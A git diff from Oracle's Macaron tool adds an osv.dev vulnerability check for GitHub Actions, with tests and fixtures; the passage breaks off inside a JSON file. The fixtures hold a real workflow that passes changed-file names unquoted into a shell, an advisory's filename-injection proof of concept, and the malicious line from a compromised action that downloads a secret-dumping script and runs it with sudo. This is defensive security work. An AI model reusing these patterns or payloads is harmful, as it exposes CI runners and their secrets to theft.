All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module provides the intermediate representations and analysis functions for GitHub Actions.""" @@ -368,8 +368,8 @@ def build_call_graph_from_path(root: BaseNode, workflow_path: str, repo_path: st Parameters ---------- - repo_path : str - The path to the repo. + root : BaseNode + The root call graph node. workflow_path: str The path to the CI workflow file. repo_path: str diff --git a/src/macaron/slsa_analyzer/git_url.py b/src/macaron/slsa_analyzer/git_url.py index 603188c5f..57edea230 100644 --- a/src/macaron/slsa_analyzer/git_url.py +++ b/src/macaron/slsa_analyzer/git_url.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module provides methods to perform generic actions on Git URLS.""" @@ -907,3 +907,79 @@ def is_empty_repo(git_obj: Git) -> bool: return False except GitCommandError: return True + + +def is_commit_hash(version_str: str) -> bool: + """Check if a given string is a valid Git commit hash. + + A valid Git commit hash is a 40-character long hexadecimal string or + a short version that is at least 7 characters long. The function uses + a regular expression to match these patterns. + + Parameters + ---------- + version_str (str): The string to be checked for validity as a commit hash. + + Returns + ------- + bool: True if the string matches the format of a Git commit hash (7 to 40 + characters long and only contains hexadecimal characters), False otherwise. 
+
+    Example
+    -------
+    >>> is_commit_hash('e3a1b6c')
+    True
+    >>> is_commit_hash('e3a1b6c8d9b2ff0c9f5f8a0a5d8f4cf2e19b1db3')
+    True
+    >>> is_commit_hash('invalid_hash123')
+    False
+    >>> is_commit_hash('master')
+    False
+    >>> is_commit_hash('main')
+    False
+    """
+    pattern = r"^[a-f0-9]{7,40}$"
+    return bool(re.match(pattern, version_str))
+
+
+def get_tags_via_git_remote(repo: str) -> dict[str, str] | None:
+    """Retrieve all tags from a given repository using ls-remote.
+
+    Parameters
+    ----------
+    repo: str
+        The repository to perform the operation on.
+
+    Returns
+    -------
+    dict[str, str]
+        A dictionary of tags mapped to their commits, or None if the operation failed.
+    """
+    tag_data = list_remote_references(["--tags"], repo)
+    if not tag_data:
+        return None
+    tags = {}
+
+    for tag_line in tag_data.splitlines():
+        tag_line = tag_line.strip()
+        if not tag_line:
+            continue
+        split = tag_line.split("\t")
+        if len(split) != 2:
+            continue
+        possible_tag = split[1]
+        if possible_tag.endswith("^{}"):
+            possible_tag = possible_tag[:-3]
+        elif possible_tag in tags:
+            # If a tag already exists, it must be the annotated reference of an annotated tag.
+            # In that case we skip the tag as it does not point to the proper source commit.
+            # Note that this should only happen if the tags are received out of standard order.
+            continue
+        possible_tag = possible_tag.replace("refs/tags/", "")
+        if not possible_tag:
+            continue
+        tags[possible_tag] = split[0]
+
+    logger.debug("Found %s tags via ls-remote of %s", len(tags), repo)
+
+    return tags
diff --git a/src/macaron/slsa_analyzer/package_registry/osv_dev.py b/src/macaron/slsa_analyzer/package_registry/osv_dev.py
new file mode 100644
index 000000000..c6f8ee39d
--- /dev/null
+++ b/src/macaron/slsa_analyzer/package_registry/osv_dev.py
@@ -0,0 +1,395 @@
+# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved.
+# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.
+
+"""This module contains implementation of osv.dev service."""
+
+import logging
+import urllib.parse
+
+import requests
+from packaging import version
+
+from macaron.config.defaults import defaults
+from macaron.errors import APIAccessError
+from macaron.json_tools import json_extract
+from macaron.slsa_analyzer.git_url import get_tags_via_git_remote, is_commit_hash
+from macaron.util import send_post_http_raw
+
+logger: logging.Logger = logging.getLogger(__name__)
+
+
+class OSVDevService:
+    """The osv.dev service class."""
+
+    @staticmethod
+    def get_vulnerabilities_purl(purl: str) -> list:
+        """Retrieve vulnerabilities associated with a specific package URL (PURL) by querying the OSV API.
+
+        This method calls the OSV query API with the provided package URL (PURL) to fetch any known vulnerabilities
+        associated with that package.
+
+        Parameters
+        ----------
+        purl : str
+            A string representing the Package URL (PURL) of the package to query for vulnerabilities.
+
+        Returns
+        -------
+        list
+            A list of vulnerabilities under the key "vulns" if any vulnerabilities are found
+            for the provided package.
+
+        Raises
+        ------
+        APIAccessError
+            If there are issues with the API URL construction, missing configuration values, or invalid responses.
+        """
+        return OSVDevService.call_osv_query_api({"package": {"purl": purl}})
+
+    @staticmethod
+    def get_vulnerabilities_package_name(ecosystem: str, name: str) -> list:
+        """
+        Retrieve vulnerabilities associated with a specific package name and ecosystem by querying the OSV API.
+
+        This method calls the OSV query API with the provided ecosystem and package name to fetch any known vulnerabilities
+        associated with that package.
+
+        Parameters
+        ----------
+        ecosystem : str
+            A string representing the ecosystem of the package (e.g., "GitHub Actions", "npm", etc.).
+
+        name : str
+            A string representing the name of the package to query for vulnerabilities.
+ + Returns + ------- + list + A list of vulnerabilities under the key "vulns" if any vulnerabilities are found + for the provided ecosystem and package name. + + Raises + ------ + APIAccessError + If there are issues with the API URL construction, missing configuration values, or invalid responses. + """ + return OSVDevService.call_osv_query_api({"package": {"ecosystem": ecosystem, "name": name}}) + + @staticmethod + def get_vulnerabilities_package_name_batch(packages: list) -> list: + """Retrieve vulnerabilities for a batch of packages based on their ecosystem and name. + + This method constructs a batch query to the OSV API to check for vulnerabilities in + multiple packages by querying the ecosystem and package name. It processes the results + while preserving the order of the input packages. If a package has associated vulnerabilities, + it is included in the returned list. + + Parameters + ---------- + packages : list + A list of dictionaries, where each dictionary represents a package with keys: + - "ecosystem" (str): The package's ecosystem (e.g., "GitHub Actions", "npm"). + - "name" (str): The name of the package. + + Returns + ------- + list + A list of packages from the input `packages` list that have associated vulnerabilities. + The order of the returned packages matches the order of the input. + + Raises + ------ + APIAccessError + If there is an issue with querying the OSV API or if the results do not match the expected size. + """ + query_data: dict[str, list] = {"queries": []} + + for pkg in packages: + query_data["queries"].append({"package": {"ecosystem": pkg["ecosystem"], "name": pkg["name"]}}) + + # The results returned by OSV reports the vulnerabilities, preserving the order. 
+ osv_res = OSVDevService.call_osv_querybatch_api(query_data, len(packages)) + results = [] + for index, res in enumerate(osv_res): + if not res: + continue + results.append(packages[index]) + + return results + + @staticmethod + def call_osv_query_api(query_data: dict) -> list: + """Query the OSV (Open Source Vulnerability) knowledge base API with the given data. + + This method sends a POST request to the OSV API and processes the response to extract + information about vulnerabilities based on the provided query data. + + Parameters + ---------- + query_data : dict + A dictionary containing the query parameters to be sent to the OSV API. + The query data should conform to the format expected by the OSV API for querying vulnerabilities. + + Returns + ------- + list + A list of vulnerabilities under the key "vulns" if the query is successful + and the response is valid. + + Raises + ------ + APIAccessError + If there are issues with the API URL construction, missing configuration values, or invalid responses. + """ + section_name = "osv_dev" + if not defaults.has_section(section_name): + return [] + section = defaults[section_name] + + url_netloc = section.get("url_netloc") + if not url_netloc: + raise APIAccessError( + f'The "url_netloc" key is missing in section [{section_name}] of the .ini configuration file.' + ) + url_scheme = section.get("url_scheme", "https") + query_endpoint = section.get("query_endpoint") + if not query_endpoint: + raise APIAccessError( + f'The "query_endpoint" key is missing in section [{section_name}] of the .ini configuration file.' 
+ ) + try: + url = urllib.parse.urlunsplit( + urllib.parse.SplitResult( + scheme=url_scheme, + netloc=url_netloc, + path=query_endpoint, + query="", + fragment="", + ) + ) + except ValueError as error: + raise APIAccessError("Failed to construct the API URL.") from error + + response = send_post_http_raw(url, json_data=query_data, headers=None) + res_obj = None + if response: + try: + res_obj = response.json() + except requests.exceptions.JSONDecodeError as error: + raise APIAccessError(f"Unable to get a valid response from {url}: {error}") from error + + vulns = res_obj.get("vulns") if res_obj else None + + if isinstance(vulns, list): + return vulns + + return [] + + @staticmethod + def call_osv_querybatch_api(query_data: dict, expected_size: int | None = None) -> list: + """Query the OSV (Open Source Vulnerability) knowledge base API in batch mode and retrieves vulnerability data. + + This method sends a batch query to the OSV API and processes the response to extract + a list of results. The method also validates that the number of results matches an + optional expected size. It handles API URL construction, error handling, and response + validation. + + Parameters + ---------- + query_data : dict + A dictionary containing the batch query data to be sent to the OSV API. This data + should conform to the expected format for batch querying vulnerabilities. + + expected_size : int, optional + The expected number of results from the query. If provided, the method checks that + the number of results matches this value. If the actual number of results does + not match the expected size, an exception is raised. Default is None. + + Returns + ------- + list + A list of results from the OSV API containing the vulnerability data that matches + the query parameters. If no valid response is received or the results are + improperly formatted, an empty list is returned. 
+
+        Raises
+        ------
+        APIAccessError
+            If any of the required configuration keys are missing, if the API URL construction
+            fails, or if the response from the OSV API is invalid or the number of results
+            does not match the expected size.
+        """
+        section_name = "osv_dev"
+        if not defaults.has_section(section_name):
+            return []
+        section = defaults[section_name]
+
+        url_netloc = section.get("url_netloc")
+        if not url_netloc:
+            raise APIAccessError(
+                f'The "url_netloc" key is missing in section [{section_name}] of the .ini configuration file.'
+            )
+        url_scheme = section.get("url_scheme", "https")
+        query_endpoint = section.get("querybatch_endpoint")
+        if not query_endpoint:
+            raise APIAccessError(
+                f'The "querybatch_endpoint" key is missing in section [{section_name}] of the .ini configuration file.'
+            )
+        try:
+            url = urllib.parse.urlunsplit(
+                urllib.parse.SplitResult(
+                    scheme=url_scheme,
+                    netloc=url_netloc,
+                    path=query_endpoint,
+                    query="",
+                    fragment="",
+                )
+            )
+        except ValueError as error:
+            raise APIAccessError("Failed to construct the API URL.") from error
+
+        response = send_post_http_raw(url, json_data=query_data, headers=None)
+        res_obj = None
+        if response:
+            try:
+                res_obj = response.json()
+            except requests.exceptions.JSONDecodeError as error:
+                raise APIAccessError(f"Unable to get a valid response from {url}: {error}") from error
+
+        results = res_obj.get("results") if res_obj else None
+
+        if isinstance(results, list):
+            if expected_size:
+                if len(results) != expected_size:
+                    raise APIAccessError(f"Unable to get a valid result from {url}")
+
+            return results
+
+        return []
+
+    @staticmethod
+    def is_version_affected(
+        vuln: dict, pkg_name: str, pkg_version: str, ecosystem: str, source_repo: str | None = None
+    ) -> bool:
+        """Check whether a specific version of a package is affected by a vulnerability.
+ + This method parses a vulnerability dictionary to determine whether a given package + version falls within the affected version ranges for the specified ecosystem. The + function handles version comparisons, extracting details about introduced and fixed + versions, and determines if the version is affected by the vulnerability. + + Parameters + ---------- + vuln : dict + A dictionary representing the vulnerability data. It should contain the affected + versions and ranges of the package in question, as well as the details of the + introduced and fixed versions for each affected range. + + pkg_name : str + The name of the package to check for vulnerability. This should match the package + name in the vulnerability data. + + pkg_version : str + The version of the package to check against the vulnerability data. + + ecosystem : str + The ecosystem (e.g., npm, GitHub Actions) to which the package belongs. This should + match the ecosystem in the vulnerability data. + + source_repo : str | None, optional + The source repository URL, used if the `pkg_version` is a commit hash. If provided, + the method will try to retrieve the corresponding version tag from the repository. + Default is None. + + Returns + ------- + bool + Returns True if the given package version is affected by the vulnerability, + otherwise returns False. + + Raises + ------ + APIAccessError + If the vulnerability data is incomplete or malformed, or if the version strings + cannot be parsed correctly. This is raised in cases such as: + - Missing affected version information + - Malformed version data (e.g., invalid version strings) + - Failure to parse the version ranges + """ + # Check if a source repository is provided and if the package version is a commit hash. + # If the package version is a commit hash, retrieve the corresponding tags from the remote repository + # and try to match the commit hash with the tag. If a match is found, update `pkg_version` to the tag. 
+        if source_repo and is_commit_hash(pkg_version):
+            tags: dict = get_tags_via_git_remote(source_repo) or {}
+            for tag, commit in tags.items():
+                if commit.startswith(pkg_version):
+                    pkg_version = tag
+                    break
+
+        affected = json_extract(vuln, ["affected"], list)
+        if not affected:
+            raise APIAccessError(f"Failed to extract info for {pkg_name}@{pkg_version}.")
+
+        affected_ranges: list | None = None
+        for rec in affected:
+            if (
+                (affected_pkg := json_extract(rec, ["package", "name"], str))
+                and affected_pkg == pkg_name
+                and (affected_eco := json_extract(rec, ["package", "ecosystem"], str))
+                and affected_eco == ecosystem
+            ):
+                affected_ranges = json_extract(rec, ["ranges"], list)
+                break
+
+        if not affected_ranges:
+            raise APIAccessError(f"Failed to extract affected versions for {pkg_name}@{pkg_version}.")
+
+        for affected_range in affected_ranges:
+            events = json_extract(affected_range, ["events"], list)
+            if not events:
+                raise APIAccessError(f"Failed to extract affected versions for {pkg_name}@{pkg_version}.")
+
+            introduced = None
+            fixed = None
+            for e in events:
+                if "introduced" in e:
+                    introduced = e["introduced"]
+                if "fixed" in e:
+                    fixed = e["fixed"]
+
+            # TODO: convert commit to tag & version
+            parsed_introduced = version.Version("0")
+            if introduced:
+                try:
+                    parsed_introduced = version.Version(introduced)
+                except version.InvalidVersion as error:
+                    logger.debug(error)
+
+            parsed_fix = None
+            if fixed:
+                try:
+                    parsed_fix = version.Version(fixed)
+                except version.InvalidVersion as error:
+                    logger.debug(error)
+
+            try:
+                parsed_version = version.Version(pkg_version)
+            except version.InvalidVersion as error:
+                raise APIAccessError(f"Failed to parse version string {pkg_version}.") from error
+
+            try:
+                if parsed_version > parsed_introduced or parsed_version == parsed_introduced:
+                    if parsed_fix is not None:
+                        if parsed_version == parsed_fix or parsed_version > parsed_fix:
+                            continue
+
+                    # If a fixed version does not exist, the current version is
affected. + return True + # We should not get this error, but if we do, we avoid false positives and continue with the next + # version range. + except ValueError as error: + logger.debug(error) + continue + + # If current version is smaller than the introduced version, it is not affected. + return False diff --git a/tests/integration/cases/oracle-macaron/check_results_policy.dl b/tests/integration/cases/oracle-macaron/check_results_policy.dl new file mode 100644 index 000000000..435715145 --- /dev/null +++ b/tests/integration/cases/oracle-macaron/check_results_policy.dl @@ -0,0 +1,11 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, purl), + match("pkg:github.com/oracle/macaron@.*", purl). diff --git a/tests/integration/cases/log4j_release_pipeline/test.yaml b/tests/integration/cases/oracle-macaron/test.yaml similarity index 56% rename from tests/integration/cases/log4j_release_pipeline/test.yaml rename to tests/integration/cases/oracle-macaron/test.yaml index 8cb0433c4..adaddb1eb 100644 --- a/tests/integration/cases/log4j_release_pipeline/test.yaml +++ b/tests/integration/cases/oracle-macaron/test.yaml @@ -1,21 +1,22 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. description: | - Analyzing with PURL and repository path without dependency resolution. + Analyzing the staging branch of the Macaron repo to detect vulnerable GitHub Actions. 
tags: - macaron-python-package -- tutorial steps: - name: Run macaron analyze kind: analyze options: command_args: - - -purl - - pkg:maven/org.apache.logging.log4j/log4j-core@3.0.0-beta3 + - -rp + - https://github.com/oracle/macaron + - -b + - staging - name: Run macaron verify-policy to verify passed/failed checks kind: verify options: - policy: policy.dl + policy: check_results_policy.dl diff --git a/tests/integration/cases/log4j_release_pipeline/policy.dl b/tests/integration/cases/org_apache_logging_log4j/policy_purl.dl similarity index 94% rename from tests/integration/cases/log4j_release_pipeline/policy.dl rename to tests/integration/cases/org_apache_logging_log4j/policy_purl.dl index 725afc643..f81ac7b07 100644 --- a/tests/integration/cases/log4j_release_pipeline/policy.dl +++ b/tests/integration/cases/org_apache_logging_log4j/policy_purl.dl @@ -10,6 +10,7 @@ Policy("test_policy", component_id, "") :- check_passed_with_confidence(component_id, "mcn_find_artifact_pipeline_1", confidence), confidence = 0.7, // Medium confidence because the pipeline was not found from a provenance. check_passed(component_id, "mcn_version_control_system_1"), + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"), check_failed(component_id, "mcn_provenance_available_1"), check_failed(component_id, "mcn_provenance_derived_commit_1"), check_failed(component_id, "mcn_provenance_derived_repo_1"), diff --git a/tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl b/tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl new file mode 100644 index 000000000..00b141481 --- /dev/null +++ b/tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
*/ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + +apply_policy_to("test_policy", component_id) :- + is_repo_url(component_id, "https://github.com/apache/logging-log4j2"). diff --git a/tests/integration/cases/org_apache_logging_log4j/test.yaml b/tests/integration/cases/org_apache_logging_log4j/test.yaml new file mode 100644 index 000000000..8da5f01b6 --- /dev/null +++ b/tests/integration/cases/org_apache_logging_log4j/test.yaml @@ -0,0 +1,33 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Analyzing with PURL and repository path without dependency resolution. + This test case is used in two tutorials: `detect-manual-upload-java-dep` and `detect-vuln-gh-actions`. + +tags: +- macaron-python-package +- tutorial + +steps: +- name: Run macaron analyze with PURL + kind: analyze + options: + command_args: + - -purl + - pkg:maven/org.apache.logging.log4j/log4j-core@3.0.0-beta3 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy_purl.dl + +- name: Run macaron analyze with repo path + kind: analyze + options: + command_args: + - -rp + - https://github.com/apache/logging-log4j2 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy_repo_url.dl diff --git a/tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml b/tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml new file mode 100644 index 000000000..03fc8e8c5 --- /dev/null +++ b/tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml @@ -0,0 +1,60 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. 
+# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +name: Check Translations +on: + pull_request_target: + types: [synchronize, opened] + paths: + - src/locales/** + +jobs: + check_translations: + runs-on: ubuntu-latest + steps: + - name: Install jq + run: sudo apt install -y jq + + - name: Fetch repo + uses: actions/checkout@v4 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.sha }} + + - name: Install node + uses: actions/setup-node@v3 + with: + node-version: 20 + + - name: Install dependencies + run: npm ci + + - name: Get changed files + id: changed-files + uses: tj-actions/changed-files@v41 + with: + sha: ${{ github.event.pull_request.head.sha }} + files: src/locales/*.json + + - name: Run i18n-extract on changed locale files + id: i18n-extract + env: + OUTPUT: '' + run: | + mkdir ./i18n-extract + for file in ${{ steps.changed-files.outputs.all_changed_files }}; do + npm run i18n-extract -- --languageFiles=src/locales/${file##*/} --output=i18n-extract/${file##*/} + MISSING=$(cat i18n-extract/${file##*/} | jq '.missingKeys | length') + UNUSED=$(cat i18n-extract/${file##*/} | jq '.unusedKeys | length') + echo "$file=|${file##*/}|${MISSING}|${UNUSED}|" >> $GITHUB_OUTPUT + done + - name: Comment PR + uses: thollander/actions-comment-pull-request@v2 + with: + message: | + Language file analysis report: + |File|Missing Keys|Unused Keys| + |:---|---:|---:| + ${{join(steps.i18n-extract.outputs.*, ' + ')}} + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json new file mode 100644 index 000000000..d9ff7d01d --- /dev/null +++ b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json @@ -0,0 +1,229 @@ +{ + "vulns": [ + { + "id": "GHSA-mcph-m25j-8j63", + "summary": "tj-actions/changed-files has Potential 
Actions command injection in output filenames (GHSL-2023-271)", + "details": "### Summary\nThe `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets.\n\n### Details\nThe [`changed-files`](https://github.com/tj-actions/changed-files) action returns a list of files changed in a commit or pull request which provides an `escape_json` input [enabled by default](https://github.com/tj-actions/changed-files/blob/94549999469dbfa032becf298d95c87a14c34394/action.yml#L136), only escapes `\"` for JSON values. \n\nThis could potentially allow filenames that contain special characters such as `;` and \\` (backtick) which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands an attacker may be able to steal **secrets** such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. For example on `push`.\n\n#### Proof of Concept\n\n1. Submit a pull request to a repository with a new file injecting a command. For example `$(whoami).txt` which is a valid filename.\n2. 
Upon approval of the workflow (triggered by the pull request), the action will get executed and the malicious pull request filename will flow into the `List all changed files` step below.\n\n```yaml\n - name: List all changed files\n run: |\n for file in ${{ steps.changed-files.outputs.all_changed_files }}; do\n echo \"$file was changed\"\n done\n```\n\nExample output:\n\n```yaml\n##[group]Run for file in $(whoami).txt; do\n for file in $(whoami).txt; do\n echo \"$file was changed\"\n done\nshell: /usr/bin/bash -e {0}\n##[endgroup]\nrunner.txt was changed\n```\n\n### Impact\n\nThis issue may lead to arbitrary command execution in the GitHub Runner.\n\n### Resolution\n- A new `safe_output` input would be enabled by default and return filename paths escaping special characters like ;, ` (backtick), $, (), etc for bash environments.\n\n- A safe recommendation of using environment variables to store unsafe outputs.\n\n```yaml\n- name: List all changed files\n env:\n ALL_CHANGED_FILES: ${{ steps.changed-files.outputs.all_changed_files }}\n run: |\n for file in \"$ALL_CHANGED_FILES\"; do\n echo \"$file was changed\"\n done\n```\n\n### Resources\n\n* [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/)\n* [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)", + "aliases": [ + "CVE-2023-51664" + ], + "modified": "2024-01-02T16:41:27Z", + "published": "2024-01-02T16:41:27Z", + "related": [ + "CVE-2023-51664" + ], + "database_specific": { + "github_reviewed_at": "2024-01-02T16:41:27Z", + "github_reviewed": true, + "severity": "HIGH", + "cwe_ids": [ + "CWE-74", + "CWE-77" + ], + "nvd_published_at": "2023-12-27T17:15:08Z" + }, + "references": [ + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63" + }, + { + 
"type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51664" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/commit/0102c07446a3cad972f4afcbd0ee4dbc4b6d2d1b" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/commit/716b1e13042866565e00e85fd4ec490e186c4a2f" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/commit/ff2f6e6b91913a7be42be1b5917330fe442f2ede" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tj-actions/changed-files" + } + ], + "affected": [ + { + "package": { + "name": "tj-actions/changed-files", + "ecosystem": "GitHub Actions" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "41" + } + ] + } + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-mcph-m25j-8j63/GHSA-mcph-m25j-8j63.json" + } + } + ], + "schema_version": "1.6.0", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ] + }, + { + "id": "GHSA-mrrh-fwg8-r2c3", + "summary": "tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.", + "details": "### Summary \nA supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.\n\nThis has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).\n\n### Details \nThe attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. 
This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs. \n\n#### Key Indicators of Compromise (IoC): \n- **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67) \n- **Retroactively updated tags pointing to the malicious commit**: \n - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n\n#### Malicious Code Execution: \nThe malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs: \n```\nB64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`\n```\n\nThis script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents. \n\n### Proof of Concept (PoC) \n#### Steps to Reproduce: \n1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action: \n\n```yml\nname: \"tj-action changed-files incident\"\non:\n pull_request:\n branches:\n - main\njobs:\n changed_files:\n runs-on: ubuntu-latest\n steps:\n - name: Get changed files\n id: changed-files\n uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67\n```\n2. Run the workflow and inspect the logs in the Actions tab. \n3. Vulnerable workflows may display secrets in the logs. 
\n\n#### Detection: \nAnalyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to: \n- `gist.githubusercontent.com` \n\nLive reproduction logs: \n🔗 [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357) \n\nThis attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`. \n\n### Duration of Vulnerability \nThe vulnerability was active between **March 14 and March 15, 2025**. \n\n### Action Required \n1. **Review your workflows executed between March 14 and March 15**: \n - Check the **changed-files** section for unexpected output. \n - Decode suspicious output using the following command: \n ```\n echo 'xxx' | base64 -d | base64 -d\n ```\n - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately. \n\n2. **Update workflows referencing the compromised commit**: \n - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version. \n\n3. **Tagged versions**: \n - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use. \n\n4. **Rotate potentially exposed secrets**: \n - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows. \n\n### Impact \n- **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage \n- **Who is impacted**: \n - Over 23,000 repositories using **tj-actions/changed-files**. \n - Organizations with public repositories are at the highest risk, as their logs may already be compromised. \n- **Potential consequences**: \n - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys). 
\n - Unauthorized access to source code, infrastructure, and production environments. \n - Credential leaks in public repositories, enabling further supply chain attacks.", + "aliases": [ + "CVE-2025-30066" + ], + "modified": "2025-03-24T14:23:37Z", + "published": "2025-03-15T06:30:34Z", + "database_specific": { + "github_reviewed_at": "2025-03-15T16:39:06Z", + "github_reviewed": true, + "severity": "HIGH", + "cwe_ids": [ + "CWE-506" + ], + "nvd_published_at": "2025-03-15T06:15:12Z" + }, + "references": [ + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mw4p-6x4p-x5m5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30066" + }, + { + "type": "WEB", + "url": "https://github.com/espressif/arduino-esp32/issues/11127" + }, + { + "type": "WEB", + "url": "https://github.com/modal-labs/modal-examples/issues/1100" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/issues/2463" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/issues/2464" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/issues/2477" + }, + { + "type": "WEB", + "url": "https://github.com/chains-project/maven-lockfile/pull/1111" + }, + { + "type": "WEB", + "url": "https://github.com/rackerlabs/genestack/pull/903" + }, + { + "type": "WEB", + "url": "https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" + }, + { + "type": "WEB", + "url": "https://www.sweet.security/blog/cve-2025-30066-tj-actions-supply-chain-attack" + }, + { + "type": "WEB", + "url": "https://www.stream.security/post/github-action-supply-chain-attack-exposes-secrets-what-you-need-to-know-and-how-to-respond" + }, + { + "type": "WEB", + "url": "https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised" + }, + { + "type": "WEB", + "url": 
